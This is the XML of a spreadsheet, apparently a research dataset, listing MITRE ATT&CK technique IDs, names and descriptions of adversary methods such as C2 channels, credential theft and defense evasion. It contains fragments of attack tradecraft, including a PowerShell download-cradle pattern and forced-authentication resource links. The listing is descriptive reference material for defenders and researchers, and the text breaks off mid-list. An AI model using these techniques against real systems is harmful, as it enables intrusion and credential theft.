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defaultThemeVersion="124226"/>
  <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
    <mc:Choice Requires="x15">
      <x15ac:absPath xmlns:x15ac="http://schemas.microsoft.com/office/spreadsheetml/2010/11/ac" url="https://scientificnet-my.sharepoint.com/personal/ramneh_unibz_it/Documents/Desktop/P.hD Stuff/SRC/DeepLearning_TransformersProject/dataset/"/>
    </mc:Choice>
  </mc:AlternateContent>
  <xr:revisionPtr revIDLastSave="2" documentId="13_ncr:1_{164D29D9-475E-409E-9520-51E2BBB0E7B5}" xr6:coauthVersionLast="47" xr6:coauthVersionMax="47" xr10:uidLastSave="{E904168F-B57B-4FC8-8E06-3C6BA3DF55E9}"/>
  <bookViews>
    <workbookView xWindow="-110" yWindow="-110" windowWidth="38620" windowHeight="21220" xr2:uid="{00000000-000D-0000-FFFF-FFFF00000000}"/>
  </bookViews>
  <sheets>
    <sheet name="Sheet4" sheetId="4" r:id="rId1"/>
  </sheets>
  <calcPr calcId="124519"/>
</workbook>
</file>

<file path=xl/sharedStrings.xml><?xml version="1.0" encoding="utf-8"?>
<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="1095" uniqueCount="1095">
  <si>
    <t>TechnqiueID</t>
  </si>
  <si>
    <t>TechnqiueName</t>
  </si>
  <si>
    <t>TechnqiueDescription</t>
  </si>
  <si>
    <t>T1599</t>
  </si>
  <si>
    <t>T1127</t>
  </si>
  <si>
    <t>T1495</t>
  </si>
  <si>
    <t>T1200</t>
  </si>
  <si>
    <t>T1589</t>
  </si>
  <si>
    <t>Network Boundary Bridging</t>
  </si>
  <si>
    <t>Trusted Developer Utilities Proxy Execution</t>
  </si>
  <si>
    <t>Firmware Corruption</t>
  </si>
  <si>
    <t>Hardware Additions</t>
  </si>
  <si>
    <t>Gather Victim Identity Information</t>
  </si>
  <si>
    <t>Adversaries may bridge network boundaries by compromising perimeter network devices or internal devices responsible for network segmentation. Breaching these devices may enable an adversary to bypass restrictions on traffic routing that otherwise separate trusted and untrusted networks.
Devices such as routers and firewalls can be used to create boundaries between trusted and untrusted networks.  They achieve this by restricting traffic types to enforce organizational policy in an attempt to reduce the risk inherent in such connections.  Restriction of traffic can be achieved by prohibiting IP addresses, layer 4 protocol ports, or through deep packet inspection to identify applications.  To participate with the rest of the network, these devices can be directly addressable or transparent, but their mode of operation has no bearing on how the adversary can bypass them when compromised.
When an adversary takes control of such a boundary device, they can bypass its policy enforcement to pass normally prohibited traffic across the trust boundary between the two separated networks without hinderance.  By achieving sufficient rights on the device, an adversary can reconfigure the device to allow the traffic they want, allowing them to then further achieve goals such as command and control via [Multi-hop Proxy](https://attack.mitre.org/techniques/T1090/003) or exfiltration of data via [Traffic Duplication](https://attack.mitre.org/techniques/T1020/001). Adversaries may also target internal devices responsible for network segmentation and abuse these in conjunction with [Internal Proxy](https://attack.mitre.org/techniques/T1090/001) to achieve the same goals.(Citation: Kaspersky ThreatNeedle Feb 2021)  In the cases where a border device separates two separate organizations, the adversary can also facilitate lateral movement into new victim environments.</t>
  </si>
  <si>
    <t>Adversaries may take advantage of trusted developer utilities to proxy execution of malicious payloads. There are many utilities used for software development related tasks that can be used to execute code in various forms to assist in development, debugging, and reverse engineering.(Citation: engima0x3 DNX Bypass)(Citation: engima0x3 RCSI Bypass)(Citation: Exploit Monday WinDbg)(Citation: LOLBAS Tracker) These utilities may often be signed with legitimate certificates that allow them to execute on a system and proxy execution of malicious code through a trusted process that effectively bypasses application control solutions.</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may overwrite or corrupt the flash memory contents of system BIOS or other firmware in devices attached to a system in order to render them inoperable or unable to boot, thus denying the availability to use the devices and/or the system.(Citation: Symantec Chernobyl W95.CIH) Firmware is software that is loaded and executed from non-volatile memory on hardware devices in order to initialize and manage device functionality. These devices may include the motherboard, hard drive, or video cards.
In general, adversaries may manipulate, overwrite, or corrupt firmware in order to deny the use of the system or devices. For example, corruption of firmware responsible for loading the operating system for network devices may render the network devices inoperable.(Citation: dhs_threat_to_net_devices)(Citation: cisa_malware_orgs_ukraine) Depending on the device, this attack may also result in [Data Destruction](https://attack.mitre.org/techniques/T1485). </t>
  </si>
  <si>
    <t>Adversaries may introduce computer accessories, networking hardware, or other computing devices into a system or network that can be used as a vector to gain access. Rather than just connecting and distributing payloads via removable storage (i.e. [Replication Through Removable Media](https://attack.mitre.org/techniques/T1091)), more robust hardware additions can be used to introduce new functionalities and/or features into a system that can then be abused.
While public references of usage by threat actors are scarce, many red teams/penetration testers leverage hardware additions for initial access. Commercial and open source products can be leveraged with capabilities such as passive network tapping, network traffic modification (i.e. [Adversary-in-the-Middle](https://attack.mitre.org/techniques/T1557)), keystroke injection, kernel memory reading via DMA, addition of new wireless access to an existing network, and others.(Citation: Ossmann Star Feb 2011)(Citation: Aleks Weapons Nov 2015)(Citation: Frisk DMA August 2016)(Citation: McMillan Pwn March 2012)</t>
  </si>
  <si>
    <t>Adversaries may gather information about the victim's identity that can be used during targeting. Information about identities may include a variety of details, including personal data (ex: employee names, email addresses, etc.) as well as sensitive details such as credentials.
Adversaries may gather this information in various ways, such as direct elicitation via [Phishing for Information](https://attack.mitre.org/techniques/T1598). Information about users could also be enumerated via other active means (i.e. [Active Scanning](https://attack.mitre.org/techniques/T1595)) such as probing and analyzing responses from authentication services that may reveal valid usernames in a system.(Citation: GrimBlog UsernameEnum) Information about victims may also be exposed to adversaries via online or other accessible data sets (ex: [Social Media](https://attack.mitre.org/techniques/T1593/001) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)).(Citation: OPM Leak)(Citation: Register Deloitte)(Citation: Register Uber)(Citation: Detectify Slack Tokens)(Citation: Forbes GitHub Creds)(Citation: GitHub truffleHog)(Citation: GitHub Gitrob)(Citation: CNET Leaks)
Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Phishing for Information](https://attack.mitre.org/techniques/T1598)), establishing operational resources (ex: [Compromise Accounts](https://attack.mitre.org/techniques/T1586)), and/or initial access (ex: [Phishing](https://attack.mitre.org/techniques/T1566) or [Valid Accounts](https://attack.mitre.org/techniques/T1078)).</t>
  </si>
  <si>
    <t>T1560</t>
  </si>
  <si>
    <t>Archive Collected Data</t>
  </si>
  <si>
    <t>An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Both compression and encryption are done prior to exfiltration, and can be performed using a utility, 3rd party library, or custom method.</t>
  </si>
  <si>
    <t>T1074</t>
  </si>
  <si>
    <t>Data Staged</t>
  </si>
  <si>
    <t>Adversaries may stage collected data in a central location or directory prior to Exfiltration. Data may be kept in separate files or combined into one file through techniques such as [Archive Collected Data](https://attack.mitre.org/techniques/T1560). Interactive command shells may be used, and common functionality within [cmd](https://attack.mitre.org/software/S0106) and bash may be used to copy data into a staging location.(Citation: PWC Cloud Hopper April 2017)
In cloud environments, adversaries may stage data within a particular instance or virtual machine before exfiltration. An adversary may [Create Cloud Instance](https://attack.mitre.org/techniques/T1578/002) and stage data in that instance.(Citation: Mandiant M-Trends 2020)
Adversaries may choose to stage data from a victim network in a centralized location prior to Exfiltration to minimize the number of connections made to their C2 server and better evade detection.</t>
  </si>
  <si>
    <t>T1025</t>
  </si>
  <si>
    <t>Data from Removable Media</t>
  </si>
  <si>
    <t>Adversaries may search connected removable media on computers they have compromised to find files of interest. Sensitive data can be collected from any removable media (optical disk drive, USB memory, etc.) connected to the compromised system prior to Exfiltration. Interactive command shells may be in use, and common functionality within [cmd](https://attack.mitre.org/software/S0106) may be used to gather information. 
Some adversaries may also use [Automated Collection](https://attack.mitre.org/techniques/T1119) on removable media.</t>
  </si>
  <si>
    <t>T1114</t>
  </si>
  <si>
    <t>Email Collection</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients. </t>
  </si>
  <si>
    <t>T1071</t>
  </si>
  <si>
    <t>Application Layer Protocol</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server. 
Adversaries may utilize many different protocols, including those used for web browsing, transferring files, electronic mail, or DNS. For connections that occur internally within an enclave (such as those between a proxy or pivot node and other nodes), commonly used protocols are SMB, SSH, or RDP. </t>
  </si>
  <si>
    <t>T1132</t>
  </si>
  <si>
    <t>Data Encoding</t>
  </si>
  <si>
    <t>Adversaries may encode data to make the content of command and control traffic more difficult to detect. Command and control (C2) information can be encoded using a standard data encoding system. Use of data encoding may adhere to existing protocol specifications and includes use of ASCII, Unicode, Base64, MIME, or other binary-to-text and character encoding systems.(Citation: Wikipedia Binary-to-text Encoding) (Citation: Wikipedia Character Encoding) Some data encoding systems may also result in data compression, such as gzip.</t>
  </si>
  <si>
    <t>T1001</t>
  </si>
  <si>
    <t>Data Obfuscation</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may obfuscate command and control traffic to make it more difficult to detect. Command and control (C2) communications are hidden (but not necessarily encrypted) in an attempt to make the content more difficult to discover or decipher and to make the communication less conspicuous and hide commands from being seen. This encompasses many methods, such as adding junk data to protocol traffic, using steganography, or impersonating legitimate protocols. </t>
  </si>
  <si>
    <t>T1568</t>
  </si>
  <si>
    <t>Dynamic Resolution</t>
  </si>
  <si>
    <t>Adversaries may dynamically establish connections to command and control infrastructure to evade common detections and remediations. This may be achieved by using malware that shares a common algorithm with the infrastructure the adversary uses to receive the malware's communications. These calculations can be used to dynamically adjust parameters such as the domain name, IP address, or port number the malware uses for command and control.
Adversaries may use dynamic resolution for the purpose of [Fallback Channels](https://attack.mitre.org/techniques/T1008). When contact is lost with the primary command and control server malware may employ dynamic resolution as a means to reestablishing command and control.(Citation: Talos CCleanup 2017)(Citation: FireEye POSHSPY April 2017)(Citation: ESET Sednit 2017 Activity)</t>
  </si>
  <si>
    <t>T1573</t>
  </si>
  <si>
    <t>Encrypted Channel</t>
  </si>
  <si>
    <t>Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.</t>
  </si>
  <si>
    <t>T1008</t>
  </si>
  <si>
    <t>Fallback Channels</t>
  </si>
  <si>
    <t>Adversaries may use fallback or alternate communication channels if the primary channel is compromised or inaccessible in order to maintain reliable command and control and to avoid data transfer thresholds.</t>
  </si>
  <si>
    <t>T1105</t>
  </si>
  <si>
    <t>Ingress Tool Transfer</t>
  </si>
  <si>
    <t>Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as [ftp](https://attack.mitre.org/software/S0095). Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. [Lateral Tool Transfer](https://attack.mitre.org/techniques/T1570)). 
On Windows, adversaries may use various utilities to download tools, such as `copy`, `finger`, [certutil](https://attack.mitre.org/software/S0160), and [PowerShell](https://attack.mitre.org/techniques/T1059/001) commands such as &lt;code&gt;IEX(New-Object Net.WebClient).downloadString()&lt;/code&gt; and &lt;code&gt;Invoke-WebRequest&lt;/code&gt;. On Linux and macOS systems, a variety of utilities also exist, such as `curl`, `scp`, `sftp`, `tftp`, `rsync`, `finger`, and `wget`.(Citation: t1105_lolbas)
Adversaries may also abuse installers and package managers, such as `yum` or `winget`, to download tools to victim hosts.
Files can also be transferred using various [Web Service](https://attack.mitre.org/techniques/T1102)s as well as native or otherwise present tools on the victim system.(Citation: PTSecurity Cobalt Dec 2016) In some cases, adversaries may be able to leverage services that sync between a web-based and an on-premises client, such as Dropbox or OneDrive, to transfer files onto victim systems. For example, by compromising a cloud account and logging into the service's web portal, an adversary may be able to trigger an automatic syncing process that transfers the file onto the victim's machine.(Citation: Dropbox Malware Sync)</t>
  </si>
  <si>
    <t>T1104</t>
  </si>
  <si>
    <t>Multi-Stage Channels</t>
  </si>
  <si>
    <t>Adversaries may create multiple stages for command and control that are employed under different conditions or for certain functions. Use of multiple stages may obfuscate the command and control channel to make detection more difficult.
Remote access tools will call back to the first-stage command and control server for instructions. The first stage may have automated capabilities to collect basic host information, update tools, and upload additional files. A second remote access tool (RAT) could be uploaded at that point to redirect the host to the second-stage command and control server. The second stage will likely be more fully featured and allow the adversary to interact with the system through a reverse shell and additional RAT features.
The different stages will likely be hosted separately with no overlapping infrastructure. The loader may also have backup first-stage callbacks or [Fallback Channels](https://attack.mitre.org/techniques/T1008) in case the original first-stage communication path is discovered and blocked.</t>
  </si>
  <si>
    <t>T1095</t>
  </si>
  <si>
    <t>Non-Application Layer Protocol</t>
  </si>
  <si>
    <t>Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.(Citation: Wikipedia OSI) Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
ICMP communication between hosts is one example.(Citation: Cisco Synful Knock Evolution) Because ICMP is part of the Internet Protocol Suite, it is required to be implemented by all IP-compatible hosts.(Citation: Microsoft ICMP) However, it is not as commonly monitored as other Internet Protocols such as TCP or UDP and may be used by adversaries to hide communications.</t>
  </si>
  <si>
    <t>T1571</t>
  </si>
  <si>
    <t>Non-Standard Port</t>
  </si>
  <si>
    <t>Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088(Citation: Symantec Elfin Mar 2019) or port 587(Citation: Fortinet Agent Tesla April 2018) as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Adversaries may also make changes to victim systems to abuse non-standard ports. For example, Registry keys and other configuration settings can be used to modify protocol and port pairings.(Citation: change_rdp_port_conti)</t>
  </si>
  <si>
    <t>T1572</t>
  </si>
  <si>
    <t>Protocol Tunneling</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may tunnel network communications to and from a victim system within a separate protocol to avoid detection/network filtering and/or enable access to otherwise unreachable systems. Tunneling involves explicitly encapsulating a protocol within another. This behavior may conceal malicious traffic by blending in with existing traffic and/or provide an outer layer of encryption (similar to a VPN). Tunneling could also enable routing of network packets that would otherwise not reach their intended destination, such as SMB, RDP, or other traffic that would be filtered by network appliances or not routed over the Internet. 
There are various means to encapsulate a protocol within another protocol. For example, adversaries may perform SSH tunneling (also known as SSH port forwarding), which involves forwarding arbitrary data over an encrypted SSH tunnel.(Citation: SSH Tunneling) 
[Protocol Tunneling](https://attack.mitre.org/techniques/T1572) may also be abused by adversaries during [Dynamic Resolution](https://attack.mitre.org/techniques/T1568). Known as DNS over HTTPS (DoH), queries to resolve C2 infrastructure may be encapsulated within encrypted HTTPS packets.(Citation: BleepingComp Godlua JUL19) 
Adversaries may also leverage [Protocol Tunneling](https://attack.mitre.org/techniques/T1572) in conjunction with [Proxy](https://attack.mitre.org/techniques/T1090) and/or [Protocol Impersonation](https://attack.mitre.org/techniques/T1001/003) to further conceal C2 communications and infrastructure. </t>
  </si>
  <si>
    <t>T1090</t>
  </si>
  <si>
    <t>Proxy</t>
  </si>
  <si>
    <t>Adversaries may use a connection proxy to direct network traffic between systems or act as an intermediary for network communications to a command and control server to avoid direct connections to their infrastructure. Many tools exist that enable traffic redirection through proxies or port redirection, including [HTRAN](https://attack.mitre.org/software/S0040), ZXProxy, and ZXPortMap. (Citation: Trend Micro APT Attack Tools) Adversaries use these types of proxies to manage command and control communications, reduce the number of simultaneous outbound network connections, provide resiliency in the face of connection loss, or to ride over existing trusted communications paths between victims to avoid suspicion. Adversaries may chain together multiple proxies to further disguise the source of malicious traffic.
Adversaries can also take advantage of routing schemes in Content Delivery Networks (CDNs) to proxy command and control traffic.</t>
  </si>
  <si>
    <t>T1219</t>
  </si>
  <si>
    <t>Remote Access Software</t>
  </si>
  <si>
    <t>An adversary may use legitimate desktop support and remote access software to establish an interactive command and control channel to target systems within networks. These services, such as `VNC`, `Team Viewer`, `AnyDesk`, `ScreenConnect`, `LogMein`, `AmmyyAdmin`, and other remote monitoring and management (RMM) tools, are commonly used as legitimate technical support software and may be allowed by application control within a target environment.(Citation: Symantec Living off the Land)(Citation: CrowdStrike 2015 Global Threat Report)(Citation: CrySyS Blog TeamSpy)
Remote access software may be installed and used post-compromise as an alternate communications channel for redundant access or as a way to establish an interactive remote desktop session with the target system. They may also be used as a component of malware to establish a reverse connection or back-connect to a service or adversary controlled system.
Adversaries may similarly abuse response features included in EDR and other defensive tools that enable remote access.
Installation of many remote access software may also include persistence (e.g., the software's installation routine creates a [Windows Service](https://attack.mitre.org/techniques/T1543/003)).</t>
  </si>
  <si>
    <t>T1102</t>
  </si>
  <si>
    <t>Web Service</t>
  </si>
  <si>
    <t>Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.
Use of Web services may also protect back-end C2 infrastructure from discovery through malware binary analysis while also enabling operational resiliency (since this infrastructure may be dynamically changed).</t>
  </si>
  <si>
    <t>T1212</t>
  </si>
  <si>
    <t>Exploitation for Credential Access</t>
  </si>
  <si>
    <t>Adversaries may exploit software vulnerabilities in an attempt to collect credentials. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. 
Credentialing and authentication mechanisms may be targeted for exploitation by adversaries as a means to gain access to useful credentials or circumvent the process to gain authenticated access to systems. One example of this is `MS14-068`, which targets Kerberos and can be used to forge Kerberos tickets using domain user permissions.(Citation: Technet MS14-068)(Citation: ADSecurity Detecting Forged Tickets) Another example of this is replay attacks, in which the adversary intercepts data packets sent between parties and then later replays these packets. If services don't properly validate authentication requests, these replayed packets may allow an adversary to impersonate one of the parties and gain unauthorized access or privileges.(Citation: Bugcrowd Replay Attack)(Citation: Comparitech Replay Attack)(Citation: Microsoft Midnight Blizzard Replay Attack)
Such exploitation has been demonstrated in cloud environments as well. For example, adversaries have exploited vulnerabilities in public cloud infrastructure that allowed for unintended authentication token creation and renewal.(Citation: Storm-0558 techniques for unauthorized email access)
Exploitation for credential access may also result in Privilege Escalation depending on the process targeted or credentials obtained.</t>
  </si>
  <si>
    <t>T1187</t>
  </si>
  <si>
    <t>Forced Authentication</t>
  </si>
  <si>
    <t>Adversaries may gather credential material by invoking or forcing a user to automatically provide authentication information through a mechanism in which they can intercept.
The Server Message Block (SMB) protocol is commonly used in Windows networks for authentication and communication between systems for access to resources and file sharing. When a Windows system attempts to connect to an SMB resource it will automatically attempt to authenticate and send credential information for the current user to the remote system. (Citation: Wikipedia Server Message Block) This behavior is typical in enterprise environments so that users do not need to enter credentials to access network resources.
Web Distributed Authoring and Versioning (WebDAV) is also typically used by Windows systems as a backup protocol when SMB is blocked or fails. WebDAV is an extension of HTTP and will typically operate over TCP ports 80 and 443. (Citation: Didier Stevens WebDAV Traffic) (Citation: Microsoft Managing WebDAV Security)
Adversaries may take advantage of this behavior to gain access to user account hashes through forced SMB/WebDAV authentication. An adversary can send an attachment to a user through spearphishing that contains a resource link to an external server controlled by the adversary (i.e. [Template Injection](https://attack.mitre.org/techniques/T1221)), or place a specially crafted file on navigation path for privileged accounts (e.g. .SCF file placed on desktop) or on a publicly accessible share to be accessed by victim(s). When the user's system accesses the untrusted resource it will attempt authentication and send information, including the user's hashed credentials, over SMB to the adversary controlled server. (Citation: GitHub Hashjacking) With access to the credential hash, an adversary can perform off-line [Brute Force](https://attack.mitre.org/techniques/T1110) cracking to gain access to plaintext credentials. (Citation: Cylance Redirect to SMB)
There are several different ways this can occur. (Citation: Osanda Stealing NetNTLM Hashes) Some specifics from in-the-wild use include:
* A spearphishing attachment containing a document with a resource that is automatically loaded when the document is opened (i.e. [Template Injection](https://attack.mitre.org/techniques/T1221)). The document can include, for example, a request similar to &lt;code&gt;file[:]//[remote address]/Normal.dotm&lt;/code&gt; to trigger the SMB request. (Citation: US-CERT APT Energy Oct 2017)
* A modified .LNK or .SCF file with the icon filename pointing to an external reference such as &lt;code&gt;\\[remote address]\pic.png&lt;/code&gt; that will force the system to load the resource when the icon is rendered to repeatedly gather credentials. (Citation: US-CERT APT Energy Oct 2017)</t>
  </si>
  <si>
    <t>T1621</t>
  </si>
  <si>
    <t>Multi-Factor Authentication Request Generation</t>
  </si>
  <si>
    <t>Adversaries may attempt to bypass multi-factor authentication (MFA) mechanisms and gain access to accounts by generating MFA requests sent to users.
Adversaries in possession of credentials to [Valid Accounts](https://attack.mitre.org/techniques/T1078) may be unable to complete the login process if they lack access to the 2FA or MFA mechanisms required as an additional credential and security control. To circumvent this, adversaries may abuse the automatic generation of push notifications to MFA services such as Duo Push, Microsoft Authenticator, Okta, or similar services to have the user grant access to their account.
In some cases, adversaries may continuously repeat login attempts in order to bombard users with MFA push notifications, SMS messages, and phone calls, potentially resulting in the user finally accepting the authentication request in response to “MFA fatigue.”(Citation: Russian 2FA Push Annoyance - Cimpanu)(Citation: MFA Fatigue Attacks - PortSwigger)(Citation: Suspected Russian Activity Targeting Government and Business Entities Around the Globe)</t>
  </si>
  <si>
    <t>T1649</t>
  </si>
  <si>
    <t>Steal or Forge Authentication Certificates</t>
  </si>
  <si>
    <t>Adversaries may steal or forge certificates used for authentication to access remote systems or resources. Digital certificates are often used to sign and encrypt messages and/or files. Certificates are also used as authentication material. For example, Azure AD device certificates and Active Directory Certificate Services (AD CS) certificates bind to an identity and can be used as credentials for domain accounts.(Citation: O365 Blog Azure AD Device IDs)(Citation: Microsoft AD CS Overview)
Authentication certificates can be both stolen and forged. For example, AD CS certificates can be stolen from encrypted storage (in the Registry or files)(Citation: APT29 Deep Look at Credential Roaming), misplaced certificate files (i.e. [Unsecured Credentials](https://attack.mitre.org/techniques/T1552)), or directly from the Windows certificate store via various crypto APIs.(Citation: SpecterOps Certified Pre Owned)(Citation: GitHub CertStealer)(Citation: GitHub GhostPack Certificates) With appropriate enrollment rights, users and/or machines within a domain can also request and/or manually renew certificates from enterprise certificate authorities (CA). This enrollment process defines various settings and permissions associated with the certificate. Of note, the certificate’s extended key usage (EKU) values define signing, encryption, and authentication use cases, while the certificate’s subject alternative name (SAN) values define the certificate owner’s alternate names.(Citation: Medium Certified Pre Owned)
Abusing certificates for authentication credentials may enable other behaviors such as [Lateral Movement](https://attack.mitre.org/tactics/TA0008). Certificate-related misconfigurations may also enable opportunities for [Privilege Escalation](https://attack.mitre.org/tactics/TA0004), by way of allowing users to impersonate or assume privileged accounts or permissions via the identities (SANs) associated with a certificate. These abuses may also enable [Persistence](https://attack.mitre.org/tactics/TA0003) via stealing or forging certificates that can be used as [Valid Accounts](https://attack.mitre.org/techniques/T1078) for the duration of the certificate's validity, despite user password resets. Authentication certificates can also be stolen and forged for machine accounts.
Adversaries who have access to root (or subordinate) CA certificate private keys (or mechanisms protecting/managing these keys) may also establish [Persistence](https://attack.mitre.org/tactics/TA0003) by forging arbitrary authentication certificates for the victim domain (known as “golden” certificates).(Citation: Medium Certified Pre Owned) Adversaries may also target certificates and related services in order to access other forms of credentials, such as [Golden Ticket](https://attack.mitre.org/techniques/T1558/001) ticket-granting tickets (TGT) or NTLM plaintext.(Citation: Medium Certified Pre Owned)</t>
  </si>
  <si>
    <t>T1552</t>
  </si>
  <si>
    <t>Unsecured Credentials</t>
  </si>
  <si>
    <t>Adversaries may search compromised systems to find and obtain insecurely stored credentials. These credentials can be stored and/or misplaced in many locations on a system, including plaintext files (e.g. [Bash History](https://attack.mitre.org/techniques/T1552/003)), operating system or application-specific repositories (e.g. [Credentials in Registry](https://attack.mitre.org/techniques/T1552/002)), or other specialized files/artifacts (e.g. [Private Keys](https://attack.mitre.org/techniques/T1552/004)).</t>
  </si>
  <si>
    <t>T1612</t>
  </si>
  <si>
    <t>Build Image on Host</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may build a container image directly on a host to bypass defenses that monitor for the retrieval of malicious images from a public registry. A remote &lt;code&gt;build&lt;/code&gt; request may be sent to the Docker API that includes a Dockerfile that pulls a vanilla base image, such as alpine, from a public or local registry and then builds a custom image upon it.(Citation: Docker Build Image)
An adversary may take advantage of that &lt;code&gt;build&lt;/code&gt; API to build a custom image on the host that includes malware downloaded from their C2 server, and then they may utilize [Deploy Container](https://attack.mitre.org/techniques/T1610) using that custom image.(Citation: Aqua Build Images on Hosts)(Citation: Aqua Security Cloud Native Threat Report June 2021) If the base image is pulled from a public registry, defenses will likely not detect the image as malicious since it’s a vanilla image. If the base image already resides in a local registry, the pull may be considered even less suspicious since the image is already in the environment. </t>
  </si>
  <si>
    <t>T1140</t>
  </si>
  <si>
    <t>Deobfuscate/Decode Files or Information</t>
  </si>
  <si>
    <t>Adversaries may use [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027) to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
One such example is the use of [certutil](https://attack.mitre.org/software/S0160) to decode a remote access tool portable executable file that has been hidden inside a certificate file.(Citation: Malwarebytes Targeted Attack against Saudi Arabia) Another example is using the Windows &lt;code&gt;copy /b&lt;/code&gt; command to reassemble binary fragments into a malicious payload.(Citation: Carbon Black Obfuscation Sept 2016)
Sometimes a user's action may be required to open it for deobfuscation or decryption as part of [User Execution](https://attack.mitre.org/techniques/T1204). The user may also be required to input a password to open a password protected compressed/encrypted file that was provided by the adversary. (Citation: Volexity PowerDuke November 2016)</t>
  </si>
  <si>
    <t>T1006</t>
  </si>
  <si>
    <t>Direct Volume Access</t>
  </si>
  <si>
    <t>Adversaries may directly access a volume to bypass file access controls and file system monitoring. Windows allows programs to have direct access to logical volumes. Programs with direct access may read and write files directly from the drive by analyzing file system data structures. This technique may bypass Windows file access controls as well as file system monitoring tools. (Citation: Hakobyan 2009)
Utilities, such as `NinjaCopy`, exist to perform these actions in PowerShell.(Citation: Github PowerSploit Ninjacopy) Adversaries may also use built-in or third-party utilities (such as `vssadmin`, `wbadmin`, and [esentutl](https://attack.mitre.org/software/S0404)) to create shadow copies or backups of data from system volumes.(Citation: LOLBAS Esentutl)</t>
  </si>
  <si>
    <t>T1480</t>
  </si>
  <si>
    <t>Execution Guardrails</t>
  </si>
  <si>
    <t>Adversaries may use execution guardrails to constrain execution or actions based on adversary supplied and environment specific conditions that are expected to be present on the target. Guardrails ensure that a payload only executes against an intended target and reduces collateral damage from an adversary’s campaign.(Citation: FireEye Kevin Mandia Guardrails) Values an adversary can provide about a target system or environment to use as guardrails may include specific network share names, attached physical devices, files, joined Active Directory (AD) domains, and local/external IP addresses.(Citation: FireEye Outlook Dec 2019)
Guardrails can be used to prevent exposure of capabilities in environments that are not intended to be compromised or operated within. This use of guardrails is distinct from typical [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497). While use of [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) may involve checking for known sandbox values and continuing with execution only if there is no match, the use of guardrails will involve checking for an expected target-specific value and only continuing with execution if there is such a match.</t>
  </si>
  <si>
    <t>T1222</t>
  </si>
  <si>
    <t>File and Directory Permissions Modification</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may modify file or directory permissions/attributes to evade access control lists (ACLs) and access protected files.(Citation: Hybrid Analysis Icacls1 June 2018)(Citation: Hybrid Analysis Icacls2 May 2018) File and directory permissions are commonly managed by ACLs configured by the file or directory owner, or users with the appropriate permissions. File and directory ACL implementations vary by platform, but generally explicitly designate which users or groups can perform which actions (read, write, execute, etc.).
Modifications may include changing specific access rights, which may require taking ownership of a file or directory and/or elevated permissions depending on the file or directory’s existing permissions. This may enable malicious activity such as modifying, replacing, or deleting specific files or directories. Specific file and directory modifications may be a required step for many techniques, such as establishing Persistence via [Accessibility Features](https://attack.mitre.org/techniques/T1546/008), [Boot or Logon Initialization Scripts](https://attack.mitre.org/techniques/T1037), [Unix Shell Configuration Modification](https://attack.mitre.org/techniques/T1546/004), or tainting/hijacking other instrumental binary/configuration files via [Hijack Execution Flow](https://attack.mitre.org/techniques/T1574).
Adversaries may also change permissions of symbolic links. For example, malware (particularly ransomware) may modify symbolic links and associated settings to enable access to files from local shortcuts with remote paths.(Citation: new_rust_based_ransomware)(Citation: bad_luck_blackcat)(Citation: falconoverwatch_blackcat_attack)(Citation: blackmatter_blackcat)(Citation: fsutil_behavior) </t>
  </si>
  <si>
    <t>T1564</t>
  </si>
  <si>
    <t>Hide Artifacts</t>
  </si>
  <si>
    <t>Adversaries may attempt to hide artifacts associated with their behaviors to evade detection. Operating systems may have features to hide various artifacts, such as important system files and administrative task execution, to avoid disrupting user work environments and prevent users from changing files or features on the system. Adversaries may abuse these features to hide artifacts such as files, directories, user accounts, or other system activity to evade detection.(Citation: Sofacy Komplex Trojan)(Citation: Cybereason OSX Pirrit)(Citation: MalwareBytes ADS July 2015)
Adversaries may also attempt to hide artifacts associated with malicious behavior by creating computing regions that are isolated from common security instrumentation, such as through the use of virtualization technology.(Citation: Sophos Ragnar May 2020)</t>
  </si>
  <si>
    <t>T1562</t>
  </si>
  <si>
    <t>Impair Defenses</t>
  </si>
  <si>
